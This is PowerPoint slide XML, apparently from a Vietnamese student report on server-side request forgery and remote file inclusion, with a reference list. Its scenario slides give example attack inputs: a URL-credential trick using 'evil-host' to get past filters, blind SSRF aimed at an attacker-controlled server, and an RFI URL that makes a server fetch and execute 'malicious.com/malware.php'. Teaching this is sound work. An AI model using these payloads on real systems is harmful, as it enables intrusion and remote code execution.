                <a:ea typeface="Roboto" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>-Nhúng thông tin xác thực vào URL trước tên máy chủ, sử dụng ký tự @. Ví dụ: </a:t>
            </a:r>
            <a:pPr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https://expected-host:fakepassword@evil-host</a:t>
            </a:r>
            <a:pPr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4" invalidUrl="" action="" tgtFrame="" tooltip="" history="1" highlightClick="0" endSnd="0">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>​</a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1450"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D6E5EF"/>
                </a:solidFill>
                <a:latin typeface="Roboto" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>​​​​</a:t>
            </a:r>
            <a:pPr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5" invalidUrl="" action="" tgtFrame="" tooltip="" history="1" highlightClick="0" endSnd="0">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>​</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7472363" y="962858"/>
            <a:ext cx="3241119" cy="186095"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1450"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5E98F1"/>
                </a:solidFill>
                <a:latin typeface="Roboto" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Kịch bản 3:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Text 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7472363" y="1253609"/>
            <a:ext cx="3241119" cy="186095"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1450"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D6E5EF"/>
                </a:solidFill>
                <a:latin typeface="Roboto" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Sử dụng SSRF mà không nhận phản hồi trực tiếp:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Text 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7472363" y="1544360"/>
            <a:ext cx="3241119" cy="372189"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="squar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Tìm một tính năng trong ứng dụng cho phép nhận URL và thay bằng URL tới một server mà mình kiểm soát.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Text 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7472363" y="1957268"/>
            <a:ext cx="3241119" cy="186095"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="non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Giám sát log trên server để xác nhận yêu cầu được gửi. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Text 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7472363" y="2184083"/>
            <a:ext cx="3241119" cy="372189"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="squar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Dù không nhận phản hồi trực tiếp, vẫn có thể xác nhận máy chủ đã gửi yêu cầu và có thể tiếp tục tấn công.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Text 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11004947" y="962858"/>
            <a:ext cx="3241119" cy="186095"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1450"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5E98F1"/>
                </a:solidFill>
                <a:latin typeface="Roboto" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Kịch bản 4:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Text 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11004947" y="1253609"/>
            <a:ext cx="3241119" cy="186095"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1450"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D6E5EF"/>
                </a:solidFill>
                <a:latin typeface="Roboto" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Remote File Inclusion (RFI)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Text 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11004947" y="1544360"/>
            <a:ext cx="3241119" cy="558284"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="squar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Giả sử ta có ứng dụng web có đường dẫn file cần tải qua URL:</a:t>
            </a:r>
            <a:pPr algn="l" indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1450"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D6E5EF"/>
                </a:solidFill>
                <a:latin typeface="Roboto" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>
</a:t>
            </a:r>
            <a:pPr algn="l"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6" invalidUrl="" action="" tgtFrame="" tooltip="" history="1" highlightClick="0" endSnd="0">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>http://nhom08.com/load.php?file=about.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Text 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11004947" y="2143363"/>
            <a:ext cx="3241119" cy="186095"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="non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Troong ứng dụng có code PHP: </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17" name="Image 0" descr="preencoded.png">    </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="11004947" y="2460308"/>
            <a:ext cx="2305645" cy="938213"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Text 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11004947" y="3529370"/>
            <a:ext cx="3241119" cy="930473"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l" marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPts val="1450"/>
              </a:lnSpc>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D6E5EF"/>
                </a:solidFill>
                <a:latin typeface="Roboto" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Lợi dụng lỗ hổng này để chỉ định một URL bên ngoài và yêu cầu máy chủ tải và thực thi file từ đó.</a:t>
            </a:r>
            <a:pPr algn="l" indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1450"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D6E5EF"/>
                </a:solidFill>
                <a:latin typeface="Roboto" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>
</a:t>
            </a:r>
            <a:pPr algn="l" indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1450"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="66A8EE"/>
                </a:solidFill>
                <a:latin typeface="Roboto" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto" pitchFamily="34" charset="-120"/>
                <a:hlinkClick r:id="rId8" invalidUrl="" action="" tgtFrame="" tooltip="" history="1" highlightClick="0" endSnd="0">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>http://nhom08.com/load.php?file=http://malicious.com/malware.php</a:t>
            </a:r>
            <a:pPr algn="l" indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1450"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D6E5EF"/>
                </a:solidFill>
                <a:latin typeface="Roboto" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>
</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="19" name="Image 1" descr="preencoded.png">    </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId9"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="11004947" y="4590693"/>
            <a:ext cx="3163967" cy="3386376"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Text 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="407194" y="8238768"/>
            <a:ext cx="13816013" cy="186095"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l" marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPts val="1450"/>
              </a:lnSpc>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5E98F1"/>
                </a:solidFill>
                <a:latin typeface="Roboto" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Kịch bản 5,6 : </a:t>
            </a:r>
            <a:pPr algn="l" indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1450"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D6E5EF"/>
                </a:solidFill>
                <a:latin typeface="Roboto" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Bổ sung sau</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224361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References</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4450" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="793790" y="3406021"/>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Hoa, L. N. (2023, 3 16). Server side request forgery vulnerabilities (SSRF) - Các lỗ hổng giả mạo yêu cầu phía máy chủ (Phần 1). </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2850"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1750" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D6E5EF"/>
                </a:solidFill>
                <a:latin typeface="Roboto" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Viblo</a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2850"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1750" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D6E5EF"/>
                </a:solidFill>
                <a:latin typeface="Roboto" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>. Retrieved 10 27, 2024, from </a:t>
            </a:r>
            <a:pPr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viblo.asia</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1750" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="793790" y="4386977"/>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Zenarmor (2024, 3 14). </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2850"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1750" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="66A8EE"/>
                </a:solidFill>
                <a:latin typeface="Roboto" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>zenarmor.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1750" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="793790" y="5005030"/>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Ltd., P. (2024, 1 1). PortSwigger. Retrieved 10 27, 2024, from </a:t>
            </a:r>
            <a:pPr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portswigger.net</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1750" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="793790" y="5623084"/>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team, O. T. (2021, 1 1). OWASP Top 10:2021. Retrieved 10 27, 2024, from </a:t>
            </a:r>
            <a:pPr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3" invalidUrl="" action="" tgtFrame="" tooltip="" history="1" highlightClick="0" endSnd="0">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>owasp.org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30711"/>
            <a:ext cx="5670590"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Nội dung báo cáo</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4450" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="793790" y="4083725"/>
            <a:ext cx="6244709" cy="453509"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="3550"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D6E5EF"/>
                </a:solidFill>
                <a:latin typeface="Roboto" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>1. Giới thiệu tổng quan đề tài</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="793790" y="4741307"/>
            <a:ext cx="6244709" cy="453509"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="3550"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D6E5EF"/>
                </a:solidFill>
                <a:latin typeface="Roboto" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>3. Mục tiêu đề tài</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7599521" y="4083725"/>
            <a:ext cx="6244709" cy="453509"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="3550"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D6E5EF"/>
                </a:solidFill>
                <a:latin typeface="Roboto" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>2. Nội dung dự kiến thực hiện</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7599521" y="4741307"/>
            <a:ext cx="6244709" cy="453509"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="3550"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D6E5EF"/>
                </a:solidFill>
                <a:latin typeface="Roboto" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>4. Phương pháp dự tính thực hiện</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0972800" y="0"/>
            <a:ext cx="3657600" cy="8229600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Image 1" descr="preencoded.png">    </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="11256407" y="3264932"/>
            <a:ext cx="3090386" cy="1699736"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text 0"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="793790" y="195024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1. Giới thiệu đề tài</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4450" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Shape 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="793790" y="2999184"/>
            <a:ext cx="9385221" cy="3280053"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 1037"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="3F4652"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1020604" y="3225998"/>
            <a:ext cx="2925604" cy="354330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
